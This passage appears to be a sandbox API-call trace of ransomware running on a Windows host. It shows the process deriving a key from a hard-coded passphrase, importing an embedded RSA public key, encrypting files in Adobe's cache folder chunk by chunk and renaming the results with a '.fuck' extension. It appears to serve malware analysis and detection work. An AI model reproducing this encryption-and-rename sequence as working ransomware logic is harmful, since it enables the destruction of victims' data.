CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.973] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.973] ReadFile (in: hFile=0x5d40, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x2c6, lpOverlapped=0x0) returned 1 [0241.973] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x2c6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x2d0) returned 1 [0241.973] WriteFile (in: hFile=0x5d44, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x2d0, lpOverlapped=0x0) returned 1 [0241.974] CloseHandle (hObject=0x5d40) returned 1 [0241.974] CloseHandle (hObject=0x5d44) returned 1 [0241.976] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat"), bFailIfExists=0) returned 1 [0241.984] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat", dwFileAttributes=0x0) returned 1 [0241.984] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat.gsg")) returned 1 [0241.987] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr.dat.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr.dat.fuck")) returned 1 [0241.998] CryptDestroyHash (hHash=0x28e7b38) returned 1 [0241.998] CryptDestroyKey (hKey=0x28e7df8) returned 1 [0241.998] CryptReleaseContext (hProv=0x28f6348, dwFlags=0x0) returned 1 [0241.998] FindNextFileA (in: hFindFile=0x28e7d78, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0241.998] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0241.999] GetLastError () returned 0x0 [0241.999] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat")) returned 0x20 [0241.999] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat", dwFileAttributes=0x80) returned 1 [0242.000] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0242.000] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\adobe\\acrobat\\dc\\iconcacherdr65536.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d40 [0242.001] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\IconCacheRdr65536.dat.gsg", dwFileAttributes=0x2) returned 1 [0242.001] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x28f6348) returned 1 [0242.011] CryptCreateHash (in: hProv=0x28f6348, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0242.011] lstrlenA (lpString="cjCYuiydaGDqRLBosfDTjZpnzMlQm") returned 29 [0242.011] CryptHashData (hHash=0x28e7df8, pbData=0x2856e58, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0242.011] CryptDeriveKey (in: hProv=0x28f6348, Algid=0x6610, hBaseData=0x28e7df8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e82b8) returned 1 [0242.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0242.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0242.011] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f3ea0) returned 1 [0242.012] CryptImportPublicKeyInfo (in: hCryptProv=0x28f3ea0, dwCertEncodingType=0x1, pInfo=0x2936960*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2936990*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2936998*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e7b38) returned 1 [0242.012] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0242.012] CryptEncrypt (in: hKey=0x28e7b38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f3f28*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f3f28*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0242.012] WriteFile (in: hFile=0x5d40, lpBuffer=0x28f3f28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x28f3f28*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0242.013] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.016] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.017] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.036] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.037] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.037] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.037] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.037] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.037] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.038] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.038] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.038] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.038] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.038] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.038] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.039] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.039] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.039] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.039] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.040] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.040] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.040] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.040] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.040] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.040] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.041] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.041] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.041] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.041] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.041] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.042] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0242.042] CryptEncrypt (in: hKey=0x28e82b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0242.042] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, 